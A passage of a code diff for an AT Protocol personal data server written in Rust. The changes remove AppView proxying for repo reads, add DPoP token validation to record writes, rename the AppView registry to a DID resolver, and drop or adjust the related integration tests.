feed.sort_by(|a, b| b.post.indexed_at.cmp(&a.post.indexed_at));
}

View File

@@ -1,75 +1,21 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::json;
use tracing::{error, info};
#[derive(Deserialize)]
pub struct DescribeRepoInput {
pub repo: String,
}
async fn proxy_describe_repo_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.describeRepo").await {
Some(r) => r,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Repo not found"})),
)
.into_response();
}
};
let target_url = match raw_query {
Some(q) => format!("{}/xrpc/com.atproto.repo.describeRepo?{}", resolved.url, q),
None => format!("{}/xrpc/com.atproto.repo.describeRepo", resolved.url),
};
info!("Proxying describeRepo to AppView: {}", target_url);
let client = proxy_client();
match client.get(&target_url).send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
let content_type = resp
.headers()
.get("content-type")
.and_then(|v| v.to_str().ok())
.map(|s| s.to_string());
match resp.bytes().await {
Ok(body) => {
let mut builder = Response::builder().status(status);
if let Some(ct) = content_type {
builder = builder.header("content-type", ct);
}
builder
.body(axum::body::Body::from(body))
.unwrap_or_else(|_| {
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
})
}
Err(e) => {
error!("Error reading AppView response: {:?}", e);
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
}
}
}
Err(e) => {
error!("Error proxying to AppView: {:?}", e);
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
}
}
}
pub async fn describe_repo(
State(state): State<AppState>,
Query(input): Query<DescribeRepoInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let user_row = if input.repo.starts_with("did:") {
sqlx::query!(
@@ -90,8 +36,19 @@ pub async fn describe_repo(
};
let (user_id, handle, did) = match user_row {
Ok(Some((id, handle, did))) => (id, handle, did),
_ => {
return proxy_describe_repo_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let collections_query = sqlx::query!(

View File

@@ -31,10 +31,11 @@ pub struct DeleteRecordInput {
pub async fn delete_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<DeleteRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};

View File

@@ -1,8 +1,7 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
@@ -12,7 +11,7 @@ use serde::{Deserialize, Serialize};
use serde_json::json;
use std::collections::HashMap;
use std::str::FromStr;
use tracing::{error, info};
use tracing::error;
#[derive(Deserialize)]
pub struct GetRecordInput {
@@ -22,69 +21,9 @@ pub struct GetRecordInput {
pub cid: Option<String>,
}
async fn proxy_get_record_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.getRecord").await {
Some(r) => r,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Repo not found"})),
)
.into_response();
}
};
let target_url = match raw_query {
Some(q) => format!("{}/xrpc/com.atproto.repo.getRecord?{}", resolved.url, q),
None => format!("{}/xrpc/com.atproto.repo.getRecord", resolved.url),
};
info!("Proxying getRecord to AppView: {}", target_url);
let client = proxy_client();
match client.get(&target_url).send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
let content_type = resp
.headers()
.get("content-type")
.and_then(|v| v.to_str().ok())
.map(|s| s.to_string());
match resp.bytes().await {
Ok(body) => {
let mut builder = Response::builder().status(status);
if let Some(ct) = content_type {
builder = builder.header("content-type", ct);
}
builder
.body(axum::body::Body::from(body))
.unwrap_or_else(|_| {
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
})
}
Err(e) => {
error!("Error reading AppView response: {:?}", e);
(
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response()
}
}
}
Err(e) => {
error!("Error proxying to AppView: {:?}", e);
(
StatusCode::BAD_GATEWAY,
Json(json!({"error": "UpstreamError"})),
)
.into_response()
}
}
}
pub async fn get_record(
State(state): State<AppState>,
Query(input): Query<GetRecordInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let user_id_opt = if input.repo.starts_with("did:") {
@@ -106,8 +45,19 @@ pub async fn get_record(
};
let user_id: uuid::Uuid = match user_id_opt {
Ok(Some(id)) => id,
_ => {
return proxy_get_record_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let record_row = sqlx::query!(
@@ -192,61 +142,9 @@ pub struct ListRecordsOutput {
pub records: Vec<serde_json::Value>,
}
async fn proxy_list_records_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.listRecords").await {
Some(r) => r,
None => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "NotFound", "message": "Repo not found"})),
)
.into_response();
}
};
let target_url = match raw_query {
Some(q) => format!("{}/xrpc/com.atproto.repo.listRecords?{}", resolved.url, q),
None => format!("{}/xrpc/com.atproto.repo.listRecords", resolved.url),
};
info!("Proxying listRecords to AppView: {}", target_url);
let client = proxy_client();
match client.get(&target_url).send().await {
Ok(resp) => {
let status =
StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
let content_type = resp
.headers()
.get("content-type")
.and_then(|v| v.to_str().ok())
.map(|s| s.to_string());
match resp.bytes().await {
Ok(body) => {
let mut builder = Response::builder().status(status);
if let Some(ct) = content_type {
builder = builder.header("content-type", ct);
}
builder
.body(axum::body::Body::from(body))
.unwrap_or_else(|_| {
(StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
})
}
Err(e) => {
error!("Error reading AppView response: {:?}", e);
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
}
}
}
Err(e) => {
error!("Error proxying to AppView: {:?}", e);
(StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
}
}
}
pub async fn list_records(
State(state): State<AppState>,
Query(input): Query<ListRecordsInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let user_id_opt = if input.repo.starts_with("did:") {
@@ -268,8 +166,19 @@ pub async fn list_records(
};
let user_id: uuid::Uuid = match user_id_opt {
Ok(Some(id)) => id,
_ => {
return proxy_list_records_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let limit = input.limit.unwrap_or(50).clamp(1, 100);

View File

@@ -56,8 +56,10 @@ pub async fn prepare_repo_write(
state: &AppState,
headers: &HeaderMap,
repo_did: &str,
http_method: &str,
http_uri: &str,
) -> Result<(String, Uuid, Cid), Response> {
let token = crate::auth::extract_bearer_token_from_header(
let extracted = crate::auth::extract_auth_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
)
.ok_or_else(|| {
@@ -67,15 +69,26 @@ pub async fn prepare_repo_write(
)
.into_response()
})?;
let auth_user = crate::auth::validate_bearer_token(&state.db, &token)
.await
.map_err(|_| {
(
StatusCode::UNAUTHORIZED,
Json(json!({"error": "AuthenticationFailed"})),
)
.into_response()
})?;
let dpop_proof = headers
.get("DPoP")
.and_then(|h| h.to_str().ok());
let auth_user = crate::auth::validate_token_with_dpop(
&state.db,
&extracted.token,
extracted.is_dpop,
dpop_proof,
http_method,
http_uri,
false,
)
.await
.map_err(|e| {
(
StatusCode::UNAUTHORIZED,
Json(json!({"error": e.to_string()})),
)
.into_response()
})?;
if repo_did != auth_user.did {
return Err((
StatusCode::FORBIDDEN,
@@ -172,10 +185,11 @@ pub struct CreateRecordOutput {
pub async fn create_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<CreateRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};
@@ -339,10 +353,11 @@ pub struct PutRecordOutput {
pub async fn put_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<PutRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};

View File

@@ -1,6 +1,7 @@
use reqwest::Client;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::sync::Arc;
use std::time::{Duration, Instant};
use tokio::sync::RwLock;
use tracing::{debug, error, info, warn};
@@ -22,24 +23,28 @@ pub struct DidService {
}
#[derive(Clone)]
struct CachedAppView {
struct CachedDid {
url: String,
did: String,
resolved_at: Instant,
}
pub struct AppViewRegistry {
namespace_to_did: HashMap<String, String>,
did_cache: RwLock<HashMap<String, CachedAppView>>,
#[derive(Debug, Clone)]
pub struct ResolvedService {
pub url: String,
pub did: String,
}
pub struct DidResolver {
did_cache: RwLock<HashMap<String, CachedDid>>,
client: Client,
cache_ttl: Duration,
plc_directory_url: String,
}
impl Clone for AppViewRegistry {
impl Clone for DidResolver {
fn clone(&self) -> Self {
Self {
namespace_to_did: self.namespace_to_did.clone(),
did_cache: RwLock::new(HashMap::new()),
client: self.client.clone(),
cache_ttl: self.cache_ttl,
@@ -48,31 +53,9 @@ impl Clone for AppViewRegistry {
}
}
#[derive(Debug, Clone)]
pub struct ResolvedAppView {
pub url: String,
pub did: String,
}
impl AppViewRegistry {
impl DidResolver {
pub fn new() -> Self {
let mut namespace_to_did = HashMap::new();
let bsky_did = std::env::var("APPVIEW_DID_BSKY")
.unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
namespace_to_did.insert("app.bsky".to_string(), bsky_did.clone());
namespace_to_did.insert("com.atproto".to_string(), bsky_did);
for (key, value) in std::env::vars() {
if let Some(namespace) = key.strip_prefix("APPVIEW_DID_") {
let namespace = namespace.to_lowercase().replace('_', ".");
if namespace != "bsky" {
namespace_to_did.insert(namespace, value);
}
}
}
let cache_ttl_secs: u64 = std::env::var("APPVIEW_CACHE_TTL_SECS")
let cache_ttl_secs: u64 = std::env::var("DID_CACHE_TTL_SECS")
.ok()
.and_then(|v| v.parse().ok())
.unwrap_or(300);
@@ -87,16 +70,9 @@ impl AppViewRegistry {
.build()
.unwrap_or_else(|_| Client::new());
info!(
"AppView registry initialized with {} namespace mappings",
namespace_to_did.len()
);
for (ns, did) in &namespace_to_did {
debug!(" {} -> {}", ns, did);
}
info!("DID resolver initialized");
Self {
namespace_to_did,
did_cache: RwLock::new(HashMap::new()),
client,
cache_ttl: Duration::from_secs(cache_ttl_secs),
@@ -104,45 +80,12 @@ impl AppViewRegistry {
}
}
pub fn register_namespace(&mut self, namespace: &str, did: &str) {
info!("Registering AppView: {} -> {}", namespace, did);
self.namespace_to_did
.insert(namespace.to_string(), did.to_string());
}
pub async fn get_appview_for_method(&self, method: &str) -> Option<ResolvedAppView> {
let namespace = self.extract_namespace(method)?;
self.get_appview_for_namespace(&namespace).await
}
pub async fn get_appview_for_namespace(&self, namespace: &str) -> Option<ResolvedAppView> {
let did = self.get_did_for_namespace(namespace)?;
self.resolve_appview_did(&did).await
}
pub fn get_did_for_namespace(&self, namespace: &str) -> Option<String> {
if let Some(did) = self.namespace_to_did.get(namespace) {
return Some(did.clone());
}
let mut parts: Vec<&str> = namespace.split('.').collect();
while !parts.is_empty() {
let prefix = parts.join(".");
if let Some(did) = self.namespace_to_did.get(&prefix) {
return Some(did.clone());
}
parts.pop();
}
None
}
pub async fn resolve_appview_did(&self, did: &str) -> Option<ResolvedAppView> {
pub async fn resolve_did(&self, did: &str) -> Option<ResolvedService> {
{
let cache = self.did_cache.read().await;
if let Some(cached) = cache.get(did) {
if cached.resolved_at.elapsed() < self.cache_ttl {
return Some(ResolvedAppView {
return Some(ResolvedService {
url: cached.url.clone(),
did: cached.did.clone(),
});
@@ -156,7 +99,7 @@ impl AppViewRegistry {
let mut cache = self.did_cache.write().await;
cache.insert(
did.to_string(),
CachedAppView {
CachedDid {
url: resolved.url.clone(),
did: resolved.did.clone(),
resolved_at: Instant::now(),
@@ -167,7 +110,7 @@ impl AppViewRegistry {
Some(resolved)
}
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedAppView> {
async fn resolve_did_internal(&self, did: &str) -> Option<ResolvedService> {
let did_doc = if did.starts_with("did:web:") {
self.resolve_did_web(did).await
} else if did.starts_with("did:plc:") {
@@ -185,7 +128,7 @@ impl AppViewRegistry {
}
};
self.extract_appview_endpoint(&doc)
self.extract_service_endpoint(&doc)
}
async fn resolve_did_web(&self, did: &str) -> Result<DidDocument, String> {
@@ -275,13 +218,13 @@ impl AppViewRegistry {
.map_err(|e| format!("Failed to parse DID document: {}", e))
}
fn extract_appview_endpoint(&self, doc: &DidDocument) -> Option<ResolvedAppView> {
fn extract_service_endpoint(&self, doc: &DidDocument) -> Option<ResolvedService> {
for service in &doc.service {
if service.service_type == "AtprotoAppView"
|| service.id.contains("atproto_appview")
|| service.id.ends_with("#bsky_appview")
{
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -290,7 +233,7 @@ impl AppViewRegistry {
for service in &doc.service {
if service.service_type.contains("AppView") || service.id.contains("appview") {
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -303,7 +246,7 @@ impl AppViewRegistry {
"No explicit AppView service found for {}, using first service: {}",
doc.id, service.service_endpoint
);
return Some(ResolvedAppView {
return Some(ResolvedService {
url: service.service_endpoint.clone(),
did: doc.id.clone(),
});
@@ -326,7 +269,7 @@ impl AppViewRegistry {
"No service found for {}, deriving URL from DID: {}://{}",
doc.id, scheme, base_host
);
return Some(ResolvedAppView {
return Some(ResolvedService {
url: format!("{}://{}", scheme, base_host),
did: doc.id.clone(),
});
@@ -335,79 +278,18 @@ impl AppViewRegistry {
None
}
fn extract_namespace(&self, method: &str) -> Option<String> {
let parts: Vec<&str> = method.split('.').collect();
if parts.len() >= 2 {
Some(format!("{}.{}", parts[0], parts[1]))
} else {
None
}
}
pub fn list_namespaces(&self) -> Vec<(String, String)> {
self.namespace_to_did
.iter()
.map(|(k, v)| (k.clone(), v.clone()))
.collect()
}
pub async fn invalidate_cache(&self, did: &str) {
let mut cache = self.did_cache.write().await;
cache.remove(did);
}
pub async fn invalidate_all_cache(&self) {
let mut cache = self.did_cache.write().await;
cache.clear();
}
}
impl Default for AppViewRegistry {
impl Default for DidResolver {
fn default() -> Self {
Self::new()
}
}
pub async fn get_appview_url_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
registry.get_appview_for_method(method).await.map(|r| r.url)
}
pub async fn get_appview_did_for_method(registry: &AppViewRegistry, method: &str) -> Option<String> {
registry.get_appview_for_method(method).await.map(|r| r.did)
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_extract_namespace() {
let registry = AppViewRegistry::new();
assert_eq!(
registry.extract_namespace("app.bsky.actor.getProfile"),
Some("app.bsky".to_string())
);
assert_eq!(
registry.extract_namespace("com.atproto.repo.createRecord"),
Some("com.atproto".to_string())
);
assert_eq!(
registry.extract_namespace("com.whtwnd.blog.getPost"),
Some("com.whtwnd".to_string())
);
assert_eq!(registry.extract_namespace("invalid"), None);
}
#[test]
fn test_get_did_for_namespace() {
let mut registry = AppViewRegistry::new();
registry.register_namespace("com.whtwnd", "did:web:whtwnd.com");
assert!(registry.get_did_for_namespace("app.bsky").is_some());
assert_eq!(
registry.get_did_for_namespace("com.whtwnd"),
Some("did:web:whtwnd.com".to_string())
);
assert!(registry.get_did_for_namespace("unknown.namespace").is_none());
}
pub fn create_did_resolver() -> Arc<DidResolver> {
Arc::new(DidResolver::new())
}

View File

@@ -317,35 +317,6 @@ pub fn app(state: AppState) -> Router {
"/xrpc/app.bsky.actor.putPreferences",
post(api::actor::put_preferences),
)
.route(
"/xrpc/app.bsky.actor.getProfile",
get(api::actor::get_profile),
)
.route(
"/xrpc/app.bsky.actor.getProfiles",
get(api::actor::get_profiles),
)
.route(
"/xrpc/app.bsky.feed.getTimeline",
get(api::feed::get_timeline),
)
.route(
"/xrpc/app.bsky.feed.getAuthorFeed",
get(api::feed::get_author_feed),
)
.route(
"/xrpc/app.bsky.feed.getActorLikes",
get(api::feed::get_actor_likes),
)
.route(
"/xrpc/app.bsky.feed.getPostThread",
get(api::feed::get_post_thread),
)
.route("/xrpc/app.bsky.feed.getFeed", get(api::feed::get_feed))
.route(
"/xrpc/app.bsky.notification.registerPush",
post(api::notification::register_push),
)
.route("/.well-known/did.json", get(api::identity::well_known_did))
.route(
"/.well-known/atproto-did",

View File

@@ -1,4 +1,4 @@
use crate::appview::AppViewRegistry;
use crate::appview::DidResolver;
use crate::cache::{Cache, DistributedRateLimiter, create_cache};
use crate::circuit_breaker::CircuitBreakers;
use crate::config::AuthConfig;
@@ -20,7 +20,7 @@ pub struct AppState {
pub circuit_breakers: Arc<CircuitBreakers>,
pub cache: Arc<dyn Cache>,
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
pub appview_registry: Arc<AppViewRegistry>,
pub did_resolver: Arc<DidResolver>,
}
pub enum RateLimitKind {
@@ -87,7 +87,7 @@ impl AppState {
let rate_limiters = Arc::new(RateLimiters::new());
let circuit_breakers = Arc::new(CircuitBreakers::new());
let (cache, distributed_rate_limiter) = create_cache().await;
let appview_registry = Arc::new(AppViewRegistry::new());
let did_resolver = Arc::new(DidResolver::new());
Self {
db,
@@ -98,7 +98,7 @@ impl AppState {
circuit_breakers,
cache,
distributed_rate_limiter,
appview_registry,
did_resolver,
}
}

View File

@@ -170,8 +170,9 @@ async fn test_update_email_via_notification_prefs() {
let pool = get_pool().await;
let (token, did) = create_account_and_login(&client).await;
let unique_email = format!("newemail_{}@example.com", uuid::Uuid::new_v4());
let prefs = json!({
"email": "newemail@example.com"
"email": unique_email
});
let resp = client
.post(format!("{}/xrpc/com.bspds.account.updateNotificationPrefs", base))
@@ -217,5 +218,5 @@ async fn test_update_email_via_notification_prefs() {
.await
.unwrap();
let body: Value = resp.json().await.unwrap();
assert_eq!(body["email"], "newemail@example.com");
assert_eq!(body["email"], unique_email);
}

View File

@@ -12,7 +12,7 @@ async fn test_search_accounts_as_admin() {
let (user_did, _) = setup_new_user("search-target").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.admin.searchAccounts",
"{}/xrpc/com.atproto.admin.searchAccounts?limit=1000",
base_url().await
))
.bearer_auth(&admin_jwt)
@@ -24,7 +24,7 @@ async fn test_search_accounts_as_admin() {
let accounts = body["accounts"].as_array().expect("accounts should be array");
assert!(!accounts.is_empty(), "Should return some accounts");
let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did));
assert!(found, "Should find the created user in results");
assert!(found, "Should find the created user in results (DID: {})", user_did);
}
#[tokio::test]
@@ -111,6 +111,7 @@ async fn test_search_accounts_pagination() {
#[tokio::test]
async fn test_search_accounts_requires_admin() {
let client = client();
let _ = create_account_and_login(&client).await;
let (_, user_jwt) = setup_new_user("search-nonadmin").await;
let res = client
.get(format!(

View File

@@ -1,135 +0,0 @@
mod common;
use common::{base_url, client, create_account_and_login};
use reqwest::StatusCode;
use serde_json::{Value, json};
#[tokio::test]
async fn test_get_author_feed_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getAuthorFeed?actor={}",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Author feed post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_actor_likes_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getActorLikes?actor={}",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 liked post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Liked post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_post_thread_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getPostThread?uri=at://{}/app.bsky.feed.post/test123",
base, did
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(
body["thread"].is_object(),
"Response should have thread object"
);
assert_eq!(
body["thread"]["$type"].as_str(),
Some("app.bsky.feed.defs#threadViewPost"),
"Thread should be a threadViewPost"
);
assert_eq!(
body["thread"]["post"]["record"]["text"].as_str(),
Some("Thread post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_get_feed_returns_appview_data() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!(
"{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test",
base
))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
let body: Value = res.json().await.unwrap();
assert!(body["feed"].is_array(), "Response should have feed array");
let feed = body["feed"].as_array().unwrap();
assert_eq!(feed.len(), 1, "Feed should have 1 post from appview");
assert_eq!(
feed[0]["post"]["record"]["text"].as_str(),
Some("Custom feed post from appview"),
"Post text should match appview response"
);
}
#[tokio::test]
async fn test_register_push_proxies_to_appview() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
.header("Authorization", format!("Bearer {}", jwt))
.json(&json!({
"serviceDid": "did:web:example.com",
"token": "test-push-token",
"platform": "ios",
"appId": "xyz.bsky.app"
}))
.send()
.await
.unwrap();
assert_eq!(res.status(), StatusCode::OK);
}

View File

@@ -141,9 +141,6 @@ async fn setup_with_external_infra() -> String {
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
unsafe {
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
}
MOCK_APPVIEW.set(mock_server).ok();
spawn_app(database_url).await
}
@@ -194,9 +191,6 @@ async fn setup_with_testcontainers() -> String {
let mock_host = mock_uri.strip_prefix("http://").unwrap_or(&mock_uri);
let mock_did = format!("did:web:{}", mock_host.replace(':', "%3A"));
setup_mock_did_document(&mock_server, &mock_did, &mock_uri).await;
unsafe {
std::env::set_var("APPVIEW_DID_APP_BSKY", &mock_did);
}
MOCK_APPVIEW.set(mock_server).ok();
S3_CONTAINER.set(s3_container).ok();
let container = Postgres::default()
@@ -238,134 +232,7 @@ async fn setup_mock_did_document(mock_server: &MockServer, did: &str, service_en
.await;
}
async fn setup_mock_appview(mock_server: &MockServer) {
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.actor.getProfile"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"handle": "mock.handle",
"did": "did:plc:mock",
"displayName": "Mock User"
})))
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.actor.searchActors"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"actors": [],
"cursor": null
})))
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getTimeline"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [],
"cursor": null
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getAuthorFeed"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-author/app.bsky.feed.post/from-appview-author",
"cid": "bafyappview123",
"author": {"did": "did:plc:mock-author", "handle": "mock.author"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Author feed post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": "author-cursor"
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getActorLikes"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-likes/app.bsky.feed.post/liked-post",
"cid": "bafyliked123",
"author": {"did": "did:plc:mock-likes", "handle": "mock.likes"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Liked post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": null
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getPostThread"))
.respond_with(
ResponseTemplate::new(200)
.insert_header("atproto-repo-rev", "0")
.set_body_json(json!({
"thread": {
"$type": "app.bsky.feed.defs#threadViewPost",
"post": {
"uri": "at://did:plc:mock/app.bsky.feed.post/thread-post",
"cid": "bafythread123",
"author": {"did": "did:plc:mock", "handle": "mock.handle"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Thread post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
},
"replies": []
}
})),
)
.mount(mock_server)
.await;
Mock::given(method("GET"))
.and(path("/xrpc/app.bsky.feed.getFeed"))
.respond_with(ResponseTemplate::new(200).set_body_json(json!({
"feed": [{
"post": {
"uri": "at://did:plc:mock-feed/app.bsky.feed.post/custom-feed-post",
"cid": "bafyfeed123",
"author": {"did": "did:plc:mock-feed", "handle": "mock.feed"},
"record": {
"$type": "app.bsky.feed.post",
"text": "Custom feed post from appview",
"createdAt": "2025-01-01T00:00:00Z"
},
"indexedAt": "2025-01-01T00:00:00Z"
}
}],
"cursor": null
})))
.mount(mock_server)
.await;
Mock::given(method("POST"))
.and(path("/xrpc/app.bsky.notification.registerPush"))
.respond_with(ResponseTemplate::new(200))
.mount(mock_server)
.await;
async fn setup_mock_appview(_mock_server: &MockServer) {
}
async fn spawn_app(database_url: String) -> String {

View File

@@ -1,104 +0,0 @@
mod common;
use common::{base_url, client, create_account_and_login};
use serde_json::json;
#[tokio::test]
async fn test_get_timeline_requires_auth() {
let client = client();
let base = base_url().await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getTimeline", base))
.send()
.await
.unwrap();
assert_eq!(res.status(), 401);
}
#[tokio::test]
async fn test_get_author_feed_requires_actor() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getAuthorFeed", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_actor_likes_requires_actor() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getActorLikes", base))
.header("Authorization", format!("Bearer {}", jwt))
.send()
.await
.unwrap();
assert_eq!(res.status(), 400);
}
#[tokio::test]
async fn test_get_post_thread_requires_uri() {
let client = client();
let base = base_url().await;
let (jwt, _did) = create_account_and_login(&client).await;
let res = client
.get(format!("{}/xrpc/app.bsky.feed.getPostThread", base))
